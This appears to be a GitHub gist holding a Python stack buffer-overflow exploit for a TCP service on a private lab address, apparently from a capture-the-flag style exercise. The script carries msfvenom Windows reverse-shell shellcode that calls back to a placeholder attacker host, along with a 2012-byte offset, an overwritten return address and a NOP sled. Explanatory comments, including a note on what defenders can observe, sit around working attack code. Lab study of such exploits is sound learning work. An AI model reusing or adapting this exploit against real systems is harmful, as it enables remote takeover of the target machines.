@jayateertha043
Created November 23, 2021 07:18
import sys, socket, time
# Target endpoint. Both values are hard-coded; the script opens one TCP
# connection to this address and sends a single crafted line to it.
ip = '10.10.111.31'
port = 9999
# Shellcode produced by msfvenom with the command quoted below.
# `-b '\x00'` asks for an encoding that contains no NUL bytes; `-f py`
# prints the result as the `buf += b"..."` lines pasted here.
"""msfvenom -p windows/shell_reverse_tcp LHOST=ATTACKERIP LPORT=4444 -b '\\x00' -f py"""
# Paste the msfvenom output here. Each generated line carries 13 bytes.
buf = b""
buf += b"\xd9\xce\xbf\x0d\xba\x7a\xc5\xd9\x74\x24\xf4\x58\x31"
buf += b"\xc9\xb1\x52\x83\xc0\x04\x31\x78\x13\x03\x75\xa9\x98"
buf += b"\x30\x79\x25\xde\xbb\x81\xb6\xbf\x32\x64\x87\xff\x21"
buf += b"\xed\xb8\xcf\x22\xa3\x34\xbb\x67\x57\xce\xc9\xaf\x58"
buf += b"\x67\x67\x96\x57\x78\xd4\xea\xf6\xfa\x27\x3f\xd8\xc3"
buf += b"\xe7\x32\x19\x03\x15\xbe\x4b\xdc\x51\x6d\x7b\x69\x2f"
buf += b"\xae\xf0\x21\xa1\xb6\xe5\xf2\xc0\x97\xb8\x89\x9a\x37"
buf += b"\x3b\x5d\x97\x71\x23\x82\x92\xc8\xd8\x70\x68\xcb\x08"
buf += b"\x49\x91\x60\x75\x65\x60\x78\xb2\x42\x9b\x0f\xca\xb0"
buf += b"\x26\x08\x09\xca\xfc\x9d\x89\x6c\x76\x05\x75\x8c\x5b"
buf += b"\xd0\xfe\x82\x10\x96\x58\x87\xa7\x7b\xd3\xb3\x2c\x7a"
buf += b"\x33\x32\x76\x59\x97\x1e\x2c\xc0\x8e\xfa\x83\xfd\xd0"
buf += b"\xa4\x7c\x58\x9b\x49\x68\xd1\xc6\x05\x5d\xd8\xf8\xd5"
buf += b"\xc9\x6b\x8b\xe7\x56\xc0\x03\x44\x1e\xce\xd4\xab\x35"
buf += b"\xb6\x4a\x52\xb6\xc7\x43\x91\xe2\x97\xfb\x30\x8b\x73"
buf += b"\xfb\xbd\x5e\xd3\xab\x11\x31\x94\x1b\xd2\xe1\x7c\x71"
buf += b"\xdd\xde\x9d\x7a\x37\x77\x37\x81\xd0\x72\xc2\x5e\x67"
buf += b"\xeb\xd0\x60\x79\xb7\x5d\x86\x13\x57\x08\x11\x8c\xce"
buf += b"\x11\xe9\x2d\x0e\x8c\x94\x6e\x84\x23\x69\x20\x6d\x49"
buf += b"\x79\xd5\x9d\x04\x23\x70\xa1\xb2\x4b\x1e\x30\x59\x8b"
buf += b"\x69\x29\xf6\xdc\x3e\x9f\x0f\x88\xd2\x86\xb9\xae\x2e"
buf += b"\x5e\x81\x6a\xf5\xa3\x0c\x73\x78\x9f\x2a\x63\x44\x20"
buf += b"\x77\xd7\x18\x77\x21\x81\xde\x21\x83\x7b\x89\x9e\x4d"
buf += b"\xeb\x4c\xed\x4d\x6d\x51\x38\x38\x91\xe0\x95\x7d\xae"
buf += b"\xcd\x71\x8a\xd7\x33\xe2\x75\x02\xf0\x12\x3c\x0e\x51"
buf += b"\xbb\x99\xdb\xe3\xa6\x19\x36\x27\xdf\x99\xb2\xd8\x24"
buf += b"\x81\xb7\xdd\x61\x05\x24\xac\xfa\xe0\x4a\x03\xfa\x20"
# `payload` is just an alias for the pasted shellcode:
# 27 lines x 13 bytes = 351 bytes (assuming every line above holds 13).
payload = buf
# Filler that occupies the vulnerable buffer up to the saved return
# address. The distance is fixed at 2012 bytes by this script; where that
# number came from is not shown here (presumably a debugger session).
offset = ("A"*2012).encode()
# The four bytes that land where the saved return address was
# (little-endian 0x625014df). The variable name says it is meant to end
# up in the instruction pointer; what that address points at is specific
# to the target build and is not documented in this script.
eip = b"\xdf\x14\x50\x62"
# 0x90 is the single-byte x86 NOP. Forty of them form a sled in front of
# the shellcode; the original note says this keeps the payload from
# being cut off.
nops = b'\x90'* 40
# The part that ends up on the stack: NOP sled followed by the shellcode.
esp = nops + payload
# Complete message body: 2012 + 4 + 40 + 351 = 2407 bytes (before the
# CRLF appended below). From a defender's view this is the observable:
# a ~2.4 KB single line sent immediately after the username exchange,
# far longer than any ordinary message on this protocol.
buffer = offset + eip + esp
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# A five-second timeout covers connect() and every recv()/send() below;
# if the service does not answer, the script raises socket.timeout.
s.settimeout(5)
s.connect((ip, port))
# Read and discard the banner the service sends on connect
# (`tmp` is never inspected).
tmp = s.recv(1024)
# The service expects a username line before it accepts a message.
user = "Jayateertha\r\n"
s.send(user.encode())
# Discard the reply to the username as well.
tmp = s.recv(1024)
print("sending "+str(len(buffer)) + " bytes")
# Terminate the message with CRLF, matching the username line above.
buffer = buffer + b"\r\n"
# NOTE(review): send() may transmit fewer bytes than requested and its
# return value is not checked here; the socket is also never closed, so
# a `with socket.socket(...) as s:` block would be the tidier shape.
s.send(buffer)